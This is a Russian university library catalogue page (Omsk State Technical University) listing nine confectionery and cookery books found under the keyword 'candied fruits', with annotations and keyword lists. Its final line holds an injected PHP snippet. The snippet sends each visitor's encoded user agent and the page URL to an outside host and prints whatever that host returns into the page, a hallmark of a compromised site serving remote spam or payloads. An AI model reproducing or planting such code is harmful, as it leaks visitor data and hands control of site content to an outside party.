Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

142 пользователей


Зарегистрированных: 1 

Борисенко Виктория Александровна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ЦУКАТЫ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 9
1. 
Сидоров В. А. Первичная обработка и заготовка продуктов впрок [Текст] / В. А. Сидоров, 1958. - 151 с.
Держатели документа (Информация об экземплярах) 
2. 
Бутейкис, Нина Григорьевна. Технология приготовления мучных кондитерских изделий [Текст] / Н. Г. Бутейкис ; дар. В. В. Арсеньев, 2009. - 300, [1] с.
Держатели документа (Информация об экземплярах) 

Приведены сведения о сырье, предназначенном для изготовления хлебобулочных и кондитерских изделий, фаршей, кремов и различных полуфабрикатов, его подготовке и рациональном использовании, а также об изготовлении полуфабрикатов и готовых изделий и их отделке. Рассмотрена технология приготовления разнообразных хлебобулочных и кондитерских изделий, фаршей, кремов и полуфабрикатов, в том числе фирменных изделий из разных видов теста на предприятиях общественного питания.

В 7-е издание внесены изменения и дополнения, касающиеся использования в кондитерском производстве новых видов сырья и технологий новых изделий, по состояниию на 1 апреля 2008 г.

Для учащихся образовательных учреждений начального профессионального образования.

3. 
Четверикова, Ольга Петровна. Сырье и ингредиенты хлебопекарного и кондитерского производства [Текст] / О. П. Четверикова, 2018. - 666 с.
Ключевые слова 
СПРАВОЧНИК -- ПШЕНИЧНАЯ -- МУКА -- РЖАНАЯ -- КРУПА -- ХЛОПЬЯ -- САХАР -- СИРОП -- ПАТОКА -- ГЛЮКОЗА -- ДЕКСТРОЗА -- ФРУКТОЗА -- ЛАКТОЗА -- МЕД -- ЖИР -- МАСЛО -- ВОДА -- ДРОЖЖИ -- ЗАКВАСКА -- МОЛОКО -- ТВОРОГ -- ИЗОЛЯТ -- ЯЙЦО -- КРАХМАЛ -- ПОДСЛАСТИТЕЛЬ -- САХАРОЗАМЕНИТЕЛЬ -- РАЗРЫХЛИТЕЛЬ -- УЛУЧШИТЕЛЬ -- ФЕРМЕНТ -- КЛЕЙКОВИНА -- БЕЛОК -- СОЛЬ -- ЭМУЛЬГАТОР -- АНТИОКСИДАНТ -- ГИДРОКОЛЛОИДЫ -- ПИЩЕВОЕ -- ВОЛОКНО -- КЛЕТЧАТКА -- ФРУКТЫ -- ЯГОДЫ -- СУХОФРУКТЫ -- ЦУКАТЫ -- ОРЕХ -- КУНЖУТ -- СОЛОД -- КАКАО -- КРАСИТЕЛЬ
Держатели документа (Информация об экземплярах) 
4. 
Бутейкис Н. Г. Технология приготовления мучных кондитерских изделий [Текст] : учебник / Н. Г. Бутейкис, 2012. - 335 с.
Держатели документа (Информация об экземплярах) 
5. 
Бутейкис Н. Г. Технология приготовления мучных кондитерских изделий [Текст] : учебник / Н. Г. Бутейкис, А. А. Жукова, 2007. - 300 с.
Держатели документа (Информация об экземплярах) 
6. 
Рыжакова, Алла Владимировна. Товароведение и экспертиза кондитерских товаров [Текст] : Учебник гриф-УМО / А. В. Рыжакова, 2005. - 224 с.

Изложены основные сведения о сырье и вспомогательных материалах, пищевых добавках, особенностях технологии производства сахаристых и мучных кондитерских изделий. Приведены информация о составе, свойствах и пищевой ценности; принципы товарной классификации и ассортиментной принадлежности; требования к качеству, маркировке, транспортированию, условиям хранения изделий. Рассмотрены процессы, протекающие при производстве и хранении, их влияние на качество изделий.

Для студентов высших учебных заведений, обучающихся по специальности "Товароведение и экспертиза товаров".

7. 
Бутейкис Н. Г. Технология приготовления мучных кондитерских изделий [Текст] : Учеб. / Н. Г. Бутейкис, А. А. Жукова, 2003. - 300 с.
Держатели документа (Информация об экземплярах) 
8. 
Шестакова Т. И. Кондитер-профессионал [Текст] : учеб. пособие / Т. И. Шестакова, 2006. - 399 с.
Ключевые слова 
МУКА ПШЕНИЧНАЯ -- МУКА СОЕВАЯ -- МУКА кукурузная -- КРАХМАЛ -- глюкоза -- фруктоза -- ПОДСЛАСТИТЕЛЬ -- патока крахмальная -- МЕД -- МОЛОКО -- ПРОДУКТЫ МОЛОЧНЫЕ -- МАСЛО СЛИВОЧНОЕ -- ЖИРЫ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ПРОДУКТЫ ВКУСОВЫЕ -- КИСЛОТА ПИЩЕВАЯ -- ВЕЩЕСТВА АРОМАТИЧЕСКИЕ -- РАЗРЫХЛИТЕЛЬ -- ФРУКТЫ -- ЦУКАТЫ -- КРУПА -- ОРЕХИ -- МАК -- УЛУЧШИТЕЛЬ хлебобулочных изделий -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- СЛИВКИ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ФАРШ -- ТЕСТО дрожжевое -- КУЛИЧИ -- БАБА РОМОВАЯ -- ТЕСТО бездрожжевое -- ВАТРУШКА -- ТЕСТО ПРЯНИЧНОЕ -- ТЕСТО ПЕСОЧНОЕ -- БИСКВИТ -- ТЕСТО ЗАВАРНОЕ -- ТЕСТО СЛОЕНОЕ -- волованы -- ФРИТЮР -- ПЕЧЕНЬЕ -- КЕКС -- ПИЦЦА -- СЛАДОСТИ ВОСТОЧНЫЕ -- СИРОП -- помадка -- ГЛАЗУРИ -- мастика -- КАРАМЕЛЬ -- кандир для сахарных фигур -- грильяж -- ЖЕЛЕ -- марципан -- ШОКОЛАД -- посыпки -- КРЕМ -- ПИРОЖНЫЕ -- ТОРТЫ
Держатели документа (Информация об экземплярах) 
9. 
Сидорина Е. И. Современная кухня [Текст] : кулинар. рецепты из доступ. продуктов / Е. И. Сидорина, 1993. - 543 с.
Ключевые слова 
СЕРВИРОВКА СТОЛА -- ЗАКУСКА ХОЛОДНАЯ -- САЛАТ -- ВИНЕГРЕТ -- ПАШТЕТ -- ЗАЛИВНОЕ -- БУТЕРБРОД -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ РЫБЫ -- СЫР -- БЛЮДА ИЗ ЯИЦ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СУП ОВОЩНОЙ -- УХА -- СУП МОЛОЧНЫЙ -- СУП ГРИБНОЙ -- БЛИНЫ -- ОЛАДЬИ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- ЗАПЕКАНКА -- ПЛОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- СОУС -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО СЛОЕНОЕ -- ТОРТЫ -- ТЕСТО БИСКВИТНОЕ -- ПЕЧЕНЬЕ -- ХВОРОСТ -- ВАФЛИ -- КЕКС -- ПИРОГ -- КРЕМ МАСЛЯНЫЙ -- КРЕМ БЕЛКОВЫЙ -- КРЕМ ЗАВАРНОЙ -- МУСС -- ЖЕЛЕ -- КОМПОТ -- КИСЕЛЬ -- БЛЮДА СЛАДКИЕ -- ЗАГОТОВКИ -- КАПУСТА КВАШЕНАЯ -- КОНСЕРВИРОВАНИЕ -- МАРИНОВАНИЕ -- ВАРЕНЬЕ -- ДЖЕМ -- ЦУКАТЫ


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3084 - 19.11.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.55 с.12 запросов, 0.26c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;